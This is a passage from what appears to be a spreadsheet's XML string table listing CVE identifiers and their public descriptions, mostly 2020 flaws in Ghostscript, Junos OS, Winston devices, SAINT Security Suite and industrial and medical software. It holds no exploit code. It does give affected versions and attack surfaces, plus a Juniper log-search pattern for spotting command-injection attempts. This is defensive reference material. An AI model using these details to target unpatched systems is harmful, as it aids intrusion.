    <t>In Yokogawa WideField3 R1.01 - R4.03, a buffer overflow could be caused when a user loads a maliciously crafted project file.</t>
  </si>
  <si>
    <t>CVE-2020-16233</t>
  </si>
  <si>
    <t>An attacker could send a specially crafted packet that could have CodeMeter (All versions prior to 7.10) send back packets containing data from the heap.</t>
  </si>
  <si>
    <t>CVE-2020-16234</t>
  </si>
  <si>
    <t>In PLC WinProladder Version 3.28 and prior, a stack-based buffer overflow vulnerability can be exploited when a valid user opens a specially crafted file, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-16235</t>
  </si>
  <si>
    <t>Inadequate encryption may allow the credentials used by Emerson OpenEnterprise, up through version 3.3.5, to access field devices and external systems to be obtained.</t>
  </si>
  <si>
    <t>CVE-2020-16236</t>
  </si>
  <si>
    <t>FPWIN Pro is vulnerable to an out-of-bounds read vulnerability when a user opens a maliciously crafted project file, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-16237</t>
  </si>
  <si>
    <t>Philips SureSigns VS4, A.07.107 and prior. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-16238</t>
  </si>
  <si>
    <t>A vulnerability in the configuration import mechanism of the B. Braun Melsungen AG SpaceCom Version L81/U61 and earlier, and the Data module compactplus Versions A10 and A11 allows attackers with command line access to the underlying Linux system to escalate privileges to the root user.</t>
  </si>
  <si>
    <t>CVE-2020-16239</t>
  </si>
  <si>
    <t>Philips SureSigns VS4, A.07.107 and prior. When an actor claims to have a given identity, the software does not prove or insufficiently proves the claim is correct.</t>
  </si>
  <si>
    <t>CVE-2020-1624</t>
  </si>
  <si>
    <t>A local, authenticated user with shell can obtain the hashed values of login passwords and shared secrets via raw objmon configuration files. This issue affects all versions of Junos OS Evolved prior to 19.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-16240</t>
  </si>
  <si>
    <t>GE Digital APM Classic, Versions 4.4 and prior. An insecure direct object reference (IDOR) vulnerability allows user account data to be downloaded in JavaScript object notation (JSON) format by users who should not have access to such functionality. An attacker can download sensitive data related to user accounts without having the proper privileges.</t>
  </si>
  <si>
    <t>CVE-2020-16241</t>
  </si>
  <si>
    <t>Philips SureSigns VS4, A.07.107 and prior. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor.</t>
  </si>
  <si>
    <t>CVE-2020-16242</t>
  </si>
  <si>
    <t>The affected Reason S20 Ethernet Switch is vulnerable to cross-site scripting (XSS), which may allow an attacker to trick application users into performing critical application actions that include, but are not limited to, adding and updating accounts.</t>
  </si>
  <si>
    <t>CVE-2020-16243</t>
  </si>
  <si>
    <t>Multiple buffer overflow vulnerabilities exist when LeviStudioU (Version 2019-09-21 and prior) processes project files. Opening a specially crafted project file could allow an attacker to exploit and execute code under the privileges of the application.</t>
  </si>
  <si>
    <t>CVE-2020-16244</t>
  </si>
  <si>
    <t>GE Digital APM Classic, Versions 4.4 and prior. Salt is not used for hash calculation of passwords, making it possible to decrypt passwords. This design flaw, along with the IDOR vulnerability, puts the entire platform at high risk because an authenticated user can retrieve all user account data and then retrieve the actual passwords.</t>
  </si>
  <si>
    <t>CVE-2020-16245</t>
  </si>
  <si>
    <t>Advantech iView, Versions 5.7 and prior. The affected product is vulnerable to path traversal vulnerabilities that could allow an attacker to create/download arbitrary files, limit system availability, and remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2020-16246</t>
  </si>
  <si>
    <t>The affected Reason S20 Ethernet Switch is vulnerable to cross-site scripting (XSS), which may allow attackers to trick users into following a link or navigating to a page that posts a malicious JavaScript statement to the vulnerable site, causing the malicious JavaScript to be rendered by the site and executed by the victim client.</t>
  </si>
  <si>
    <t>CVE-2020-16247</t>
  </si>
  <si>
    <t>Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.</t>
  </si>
  <si>
    <t>CVE-2020-16248</t>
  </si>
  <si>
    <t>** DISPUTED ** Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF. NOTE: follow-on discussion suggests that this might plausibly be interpreted as both intended functionality and also a vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-1625</t>
  </si>
  <si>
    <t>The kernel memory usage represented as "temp" via 'show system virtual-memory' may constantly increase when Integrated Routing and Bridging (IRB) is configured with multiple underlay physical interfaces, and one interface flaps. This memory leak can affect running daemons (processes), leading to an extended Denial of Service (DoS) condition. Usage of "temp" virtual memory, shown here by a constantly increasing value of outstanding Requests, can be monitored by executing the 'show system virtual-memory' command as shown below: user@junos&gt; show system virtual-memory |match "fpc|type|temp" fpc0: -------------------------------------------------------------------------- Type InUse MemUse HighUse Requests Size(s) temp 2023 431K - 10551 16,32,64,128,256,512,1024,2048,4096,65536,262144,1048576,2097152,4194304,8388608 fpc1: -------------------------------------------------------------------------- Type InUse MemUse HighUse Requests Size(s) temp 2020 431K - 6460 16,32,64,128,256,512,1024,2048,4096,65536,262144,1048576,2097152,4194304,8388608 user@junos&gt; show system virtual-memory |match "fpc|type|temp" fpc0: -------------------------------------------------------------------------- Type InUse MemUse HighUse Requests Size(s) temp 2023 431K - 16101 16,32,64,128,256,512,1024,2048,4096,65536,262144,1048576,2097152,4194304,8388608 fpc1: -------------------------------------------------------------------------- Type InUse MemUse HighUse Requests Size(s) temp 2020 431K - 6665 16,32,64,128,256,512,1024,2048,4096,65536,262144,1048576,2097152,4194304,8388608 user@junos&gt; show system virtual-memory |match "fpc|type|temp" fpc0: -------------------------------------------------------------------------- Type InUse MemUse HighUse Requests Size(s) temp 2023 431K - 21867 16,32,64,128,256,512,1024,2048,4096,65536,262144,1048576,2097152,4194304,8388608 fpc1: -------------------------------------------------------------------------- Type InUse MemUse HighUse Requests Size(s) temp 2020 431K - 6858 16,32,64,128,256,512,1024,2048,4096,65536,262144,1048576,2097152,4194304,8388608 This issue affects Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S6; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R2-S8, 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D44; 17.3 versions prior to 17.3R2-S5, 17.3R3-S6; 17.4 versions prior to 17.4R2-S5, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R2-S5, 18.2R3; 18.2X75 versions prior to 18.2X75-D33, 18.2X75-D411, 18.2X75-D420, 18.2X75-D60; 18.3 versions prior to 18.3R1-S5, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R2-S2, 18.4R3; 19.1 versions prior to 19.1R1-S3, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2. This issue does not affect Juniper Networks Junos OS 12.3 and 15.1.</t>
  </si>
  <si>
    <t>CVE-2020-16250</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise versions 0.7.1 and newer, when configured with the AWS IAM auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1..</t>
  </si>
  <si>
    <t>CVE-2020-16251</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise versions 0.8.3 and newer, when configured with the GCP GCE auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1.</t>
  </si>
  <si>
    <t>CVE-2020-16252</t>
  </si>
  <si>
    <t>The Field Test gem 0.2.0 through 0.3.2 for Ruby allows CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-16253</t>
  </si>
  <si>
    <t>The PgHero gem through 2.6.0 for Ruby allows CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-16254</t>
  </si>
  <si>
    <t>The Chartkick gem through 3.3.2 for Ruby allows Cascading Style Sheets (CSS) Injection (without attribute).</t>
  </si>
  <si>
    <t>CVE-2020-16255</t>
  </si>
  <si>
    <t>ownCloud (Core) before 10.5 allows XSS in login page 'forgot password.'</t>
  </si>
  <si>
    <t>CVE-2020-16256</t>
  </si>
  <si>
    <t>The API on Winston 1.5.4 devices is vulnerable to CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-16257</t>
  </si>
  <si>
    <t>Winston 1.5.4 devices are vulnerable to command injection via the API.</t>
  </si>
  <si>
    <t>CVE-2020-16258</t>
  </si>
  <si>
    <t>Winston 1.5.4 devices make use of a Monit service (not managed during the normal user process) which is configured with default credentials.</t>
  </si>
  <si>
    <t>CVE-2020-16259</t>
  </si>
  <si>
    <t>Winston 1.5.4 devices have an SSH user account with access from bastion hosts. This is undocumented in device documents and is not announced to the user.</t>
  </si>
  <si>
    <t>CVE-2020-1626</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks Junos OS Evolved may allow an attacker to cause a Denial of Service (DoS) by sending a high rate of specific packets to the device, resulting in a pfemand process crash. The pfemand process is responsible for packet forwarding on the device. By continuously sending the packet flood, an attacker can repeatedly crash the pfemand process causing a sustained Denial of Service. This issue can only be triggered by traffic sent to the device. Transit traffic does not cause this issue. This issue affects all version of Junos OS Evolved prior to 19.1R1-EVO.</t>
  </si>
  <si>
    <t>CVE-2020-16260</t>
  </si>
  <si>
    <t>Winston 1.5.4 devices do not enforce authorization. This is exploitable from the intranet, and can be combined with other vulnerabilities for remote exploitation.</t>
  </si>
  <si>
    <t>CVE-2020-16261</t>
  </si>
  <si>
    <t>Winston 1.5.4 devices allow a U-Boot interrupt, resulting in local root access.</t>
  </si>
  <si>
    <t>CVE-2020-16262</t>
  </si>
  <si>
    <t>Winston 1.5.4 devices have a local www-data user that is overly permissioned, resulting in root privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-16263</t>
  </si>
  <si>
    <t>Winston 1.5.4 devices have a CORS configuration that trusts arbitrary origins. This allows requests to be made and viewed by arbitrary origins.</t>
  </si>
  <si>
    <t>CVE-2020-16266</t>
  </si>
  <si>
    <t>An XSS issue was discovered in MantisBT before 2.24.2. Improper escaping on view_all_bug_page.php allows a remote attacker to inject arbitrary HTML into the page by saving it into a text Custom Field, leading to possible code execution in the browser of any user subsequently viewing the issue (if CSP settings allow it).</t>
  </si>
  <si>
    <t>CVE-2020-16267</t>
  </si>
  <si>
    <t>Zoho ManageEngine Applications Manager version 14740 and prior allows an authenticated SQL Injection via a crafted jsp request in the RCA module.</t>
  </si>
  <si>
    <t>CVE-2020-16268</t>
  </si>
  <si>
    <t>The MSI installer in 1E Client 4.1.0.267 and 5.0.0.745 allows remote authenticated users and local users to gain elevated privileges via the repair option. This applies to installations that have a TRANSFORM (MST) with the option to disable the installation of the Nomad module. An attacker may craft a .reg file in a specific location that will be able to write to any registry key as an elevated user.</t>
  </si>
  <si>
    <t>CVE-2020-16269</t>
  </si>
  <si>
    <t>radare2 4.5.0 misparses DWARF information in executable files, causing a segmentation fault in parse_typedef in type_dwarf.c via a malformed DW_AT_name in the .debug_info section.</t>
  </si>
  <si>
    <t>CVE-2020-1627</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks Junos OS on vMX and MX150 devices may allow an attacker to cause a Denial of Service (DoS) by sending specific packets requiring special processing in microcode that the flow cache can't handle, causing the riot forwarding daemon to crash. By continuously sending the same specific packets, an attacker can repeatedly crash the riot process causing a sustained Denial of Service. Flow cache is specific to vMX based products and the MX150, and is enabled by default in performance mode. This issue can only be triggered by traffic destined to the device. Transit traffic will not cause the riot daemon to crash. When the issue occurs, a core dump and riot log file entry are generated. For example: /var/crash/core.J-UKERN.mpc0.1557255993.3864.gz /home/pfe/RIOT logs: fpc0 riot[1888]: PANIC in lu_reorder_send_packet_postproc(): fpc0 riot[6655]: PANIC in lu_reorder_send_packet_postproc(): This issue affects Juniper Networks Junos OS: 18.1 versions prior to 18.1R3 on vMX and MX150; 18.2 versions prior to 18.2R3 on vMX and MX150; 18.2X75 versions prior to 18.2X75-D60 on vMX and MX150; 18.3 versions prior to 18.3R3 on vMX and MX150; 18.4 versions prior to 18.4R2 on vMX and MX150; 19.1 versions prior to 19.1R2 on vMX and MX150. This issue does not affect Junos OS versions prior to 18.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-16270</t>
  </si>
  <si>
    <t>OLIMPOKS under 3.3.39 allows Auth/Admin ErrorMessage XSS. Remote Attacker can use discovered vulnerability to inject malicious JavaScript payload to victim’s browsers in context of vulnerable applications. Executed code can be used to steal administrator’s cookies, influence HTML content of targeted application and perform phishing-related attacks. Vulnerable application used in more than 3000 organizations in different sectors from retail to industries.</t>
  </si>
  <si>
    <t>CVE-2020-16271</t>
  </si>
  <si>
    <t>The SRP-6a implementation in Kee Vault KeePassRPC before 1.12.0 generates insufficiently random numbers, which allows remote attackers to read and modify data in the KeePass database via a WebSocket connection.</t>
  </si>
  <si>
    <t>CVE-2020-16272</t>
  </si>
  <si>
    <t>The SRP-6a implementation in Kee Vault KeePassRPC before 1.12.0 is missing validation for a client-provided parameter, which allows remote attackers to read and modify data in the KeePass database via an A=0 WebSocket connection.</t>
  </si>
  <si>
    <t>CVE-2020-16273</t>
  </si>
  <si>
    <t>In Arm software implementing the Armv8-M processors (all versions), the stack selection mechanism could be influenced by a stack-underflow attack in v8-M TrustZone based processors. An attacker can cause a change to the stack pointer used by the Secure World from a non-secure application if the stack is not initialized. This vulnerability affects only the software that is based on Armv8-M processors with the Security Extension.</t>
  </si>
  <si>
    <t>CVE-2020-16275</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the Credential Manager component in SAINT Security Suite 8.0 through 9.8.20 could allow arbitrary script to run in the context of a logged-in user when the user clicks on a specially crafted link.</t>
  </si>
  <si>
    <t>CVE-2020-16276</t>
  </si>
  <si>
    <t>An SQL injection vulnerability in the Assets component of SAINT Security Suite 8.0 through 9.8.20 allows a remote, authenticated attacker to gain unauthorized access to the database.</t>
  </si>
  <si>
    <t>CVE-2020-16277</t>
  </si>
  <si>
    <t>An SQL injection vulnerability in the Analytics component of SAINT Security Suite 8.0 through 9.8.20 allows a remote, authenticated attacker to gain unauthorized access to the database.</t>
  </si>
  <si>
    <t>CVE-2020-16278</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the Permissions component in SAINT Security Suite 8.0 through 9.8.20 could allow arbitrary script to run in the context of a logged-in user when the user clicks on a specially crafted link.</t>
  </si>
  <si>
    <t>CVE-2020-16279</t>
  </si>
  <si>
    <t>The Kommbox component in Rangee GmbH RangeeOS 8.0.4 is vulnerable to Remote Code Execution due to untrusted user supplied input being passed to the command line without sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-1628</t>
  </si>
  <si>
    <t>Juniper Networks Junos OS uses the 128.0.0.0/2 subnet for internal communications between the RE and PFEs. It was discovered that packets utilizing these IP addresses may egress an EX4300 switch, leaking configuration information such as heartbeats, kernel versions, etc. out to the Internet, leading to an information exposure vulnerability. This issue affects Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D53 on EX4300; 15.1 versions prior to 15.1R7-S6 on EX4300; 15.1X49 versions prior to 15.1X49-D200, 15.1X49-D210 on EX4300; 16.1 versions prior to 16.1R7-S7 on EX4300; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2 on EX4300; 17.2 versions prior to 17.2R3-S3 on EX4300; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7 on EX4300; 17.4 versions prior to 17.4R2-S9, 17.4R3 on EX4300; 18.1 versions prior to 18.1R3-S8 on EX4300; 18.2 versions prior to 18.2R3-S2 on EX4300; 18.3 versions prior to 18.3R2-S3, 18.3R3, 18.3R3-S1 on EX4300; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3 on EX4300; 19.1 versions prior to 19.1R1-S4, 19.1R2 on EX4300; 19.2 versions prior to 19.2R1-S4, 19.2R2 on EX4300; 19.3 versions prior to 19.3R1-S1, 19.3R2 on EX4300.</t>
  </si>
  <si>
    <t>CVE-2020-16280</t>
  </si>
  <si>
    <t>Multiple Rangee GmbH RangeeOS 8.0.4 modules store credentials in plaintext including credentials of users for several external facing administrative services, domain joined users, and local administrators. To exploit the vulnerability a local attacker must have access to the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-16281</t>
  </si>
  <si>
    <t>The Kommbox component in Rangee GmbH RangeeOS 8.0.4 could allow a local authenticated attacker to escape from the restricted environment and execute arbitrary code due to unrestricted context menus being accessible.</t>
  </si>
  <si>
    <t>CVE-2020-16282</t>
  </si>
  <si>
    <t>In the default configuration of Rangee GmbH RangeeOS 8.0.4, all components are executed in the context of the privileged root user. This may allow a local attacker to break out of the restricted environment or inject malicious code into the application and fully compromise the operating system.</t>
  </si>
  <si>
    <t>CVE-2020-16287</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in lprn_is_black() in contrib/lips4/gdevlprn.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16288</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in pj_common_print_page() in devices/gdevpjet.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16289</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in cif_print_page() in devices/gdevcif.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-1629</t>
  </si>
  <si>
    <t>A race condition vulnerability on Juniper Network Junos OS devices may cause the routing protocol daemon (RPD) process to crash and restart while processing a BGP NOTIFICATION message. This issue affects Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S6; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R1-S9, 17.2R3-S3; 17.2 version 17.2R2 and later versions; 17.2X75 versions prior to 17.2X75-D105, 17.2X75-D110; 17.3 versions prior to 17.3R2-S5, 17.3R3-S6; 17.4 versions prior to 17.4R2-S7, 17.4R3; 18.1 versions prior to 18.1R3-S8; 18.2 versions prior to 18.2R3-S3; 18.2X75 versions prior to 18.2X75-D410, 18.2X75-D420, 18.2X75-D50, 18.2X75-D60; 18.3 versions prior to 18.3R1-S5, 18.3R2-S2, 18.3R3; 18.4 versions prior to 18.4R2-S2, 18.4R3; 19.1 versions prior to 19.1R1-S2, 19.1R2; 19.2 versions prior to 19.2R1-S4, 19.2R2. This issue does not affect Juniper Networks Junos OS prior to version 16.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-16290</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in jetp3852_print_page() in devices/gdev3852.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16291</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in contrib/gdevdj9.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16292</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in mj_raster_cmd() in contrib/japanese/gdevmjc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16293</t>
  </si>
  <si>
    <t>A null pointer dereference vulnerability in compose_group_nonknockout_nonblend_isolated_allmask_common() in base/gxblend.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16294</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in epsc_print_page() in devices/gdevepsc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16295</t>
  </si>
  <si>
    <t>A null pointer dereference vulnerability in clj_media_size() in devices/gdevclj.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16296</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in GetNumWrongData() in contrib/lips4/gdevlips.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16297</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in FloydSteinbergDitheringC() in contrib/gdevbjca.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16298</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in mj_color_correct() in contrib/japanese/gdevmjc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16299</t>
  </si>
  <si>
    <t>A Division by Zero vulnerability in bj10v_print_page() in contrib/japanese/gdev10v.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-1630</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability in Juniper Networks Junos OS devices configured with dual Routing Engines (RE), Virtual Chassis (VC) or high-availability cluster may allow a local authenticated low-privileged user with access to the shell to perform unauthorized configuration modification. This issue does not affect Junos OS device with single RE or stand-alone configuration. This issue affects Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S14; 12.3X48 versions prior to 12.3X48-D86, 12.3X48-D90; 14.1X53 versions prior to 14.1X53-D51; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D181, 15.1X49-D190; 15.1X53 versions prior to 15.1X53-D592; 16.1 versions prior to 16.1R4-S13, 16.1R7-S6; 16.2 versions prior to 16.2R2-S10; 17.1 versions prior to 17.1R2-S11, 17.1R3-S1; 17.2 versions prior to 17.2R1-S9, 17.2R3-S3; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S6, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R2-S5, 18.2R3-S1; 18.2 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D420, 18.2X75-D60, 18.2X75-D411; 18.3 versions prior to 18.3R1-S5, 18.3R2-S1, 18.3R3; 18.4 versions prior to 18.4R1-S4, 18.4R2-S1, 18.4R3; 19.1 versions prior to 19.1R1-S2, 19.1R2; 19.2 versions prior to 19.2R1-S1, 19.2R2.</t>
  </si>
  <si>
    <t>CVE-2020-16300</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in tiff12_print_page() in devices/gdevtfnx.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16301</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in okiibm_print_page1() in devices/gdevokii.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16302</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in jetp3852_print_page() in devices/gdev3852.c of Artifex Software GhostScript v9.50 allows a remote attacker to escalate privileges via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16303</t>
  </si>
  <si>
    <t>A use-after-free vulnerability in xps_finish_image_path() in devices/vector/gdevxps.c of Artifex Software GhostScript v9.50 allows a remote attacker to escalate privileges via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16304</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in image_render_color_thresh() in base/gxicolor.c of Artifex Software GhostScript v9.50 allows a remote attacker to escalate privileges via a crafted eps file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16305</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in pcx_write_rle() in contrib/japanese/gdev10v.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16306</t>
  </si>
  <si>
    <t>A null pointer dereference vulnerability in devices/gdevtsep.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted postscript file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16307</t>
  </si>
  <si>
    <t>A null pointer dereference vulnerability in devices/vector/gdevtxtw.c and psi/zbfont.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted postscript file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16308</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in p_print_image() in devices/gdevcdj.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-16309</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in lxm5700m_print_page() in devices/gdevlxm.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted eps file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-1631</t>
  </si>
  <si>
    <t>A vulnerability in the HTTP/HTTPS service used by J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP) allows an unauthenticated attacker to perform local file inclusion (LFI) or path traversal. Using this vulnerability, an attacker may be able to inject commands into the httpd.log, read files with 'world' readable permission file or obtain J-Web session tokens. In the case of command injection, as the HTTP service runs as user 'nobody', the impact of this command injection is limited. (CVSS score 5.3, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) In the case of reading files with 'world' readable permission, in Junos OS 19.3R1 and above, the unauthenticated attacker would be able to read the configuration file. (CVSS score 5.9, vector CVSS:3.1/ AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) If J-Web is enabled, the attacker could gain the same level of access of anyone actively logged into J-Web. If an administrator is logged in, the attacker could gain administrator access to J-Web. (CVSS score 8.8, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled. Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device&gt; show system processes | match http 5260 - S 0:00.13 /usr/sbin/httpd-gk -N 5797 - I 0:00.10 /usr/sbin/httpd --config /jail/var/etc/httpd.conf To summarize: If HTTP/HTTPS services are disabled, there is no impact from this vulnerability. If HTTP/HTTPS services are enabled and J-Web is not in use, this vulnerability has a CVSS score of 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). If J-Web is enabled, this vulnerability has a CVSS score of 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). Juniper SIRT has received a single report of this vulnerability being exploited in the wild. Out of an abundance of caution, we are notifying customers so they can take appropriate actions. Indicators of Compromise: The /var/log/httpd.log may have indicators that commands have injected or files being accessed. The device administrator can look for these indicators by searching for the string patterns "=*;*&amp;" or "*%3b*&amp;" in /var/log/httpd.log, using the following command: user@device&gt; show log httpd.log | match "=*;*&amp;|=*%3b*&amp;" If this command returns any output, it might be an indication of malicious attempts or simply scanning activities. Rotated logs should also be reviewed, using the following command: user@device&gt; show log httpd.log.0.gz | match "=*;*&amp;|=*%3b*&amp;" user@device&gt; show log httpd.log.1.gz | match "=*;*&amp;|=*%3b*&amp;" Note that a skilled attacker would likely remove these entries from the local log file, thus effectively eliminating any reliable signature that the device had been attacked. This issue affects Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D101, 12.3X48-D105; 14.1X53 versions prior to 14.1X53-D54; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D211, 15.1X49-D220; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R3-S2 ; 18.4 version 18.4R2 and later versions; 19.1 versions prior to 19.1R1-S5, 19.1R3-S1; 19.1 version 19.1R2 and later versions; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2; 20.1 versions prior to 20.1R1-S1, 20.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-16310</t>
  </si>
  <si>
    <t>A division by zero vulnerability in dot24_print_page() in devices/gdevdm24.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.</t>
  </si>
  <si>
    <t>CVE-2020-1632</t>
  </si>
  <si>
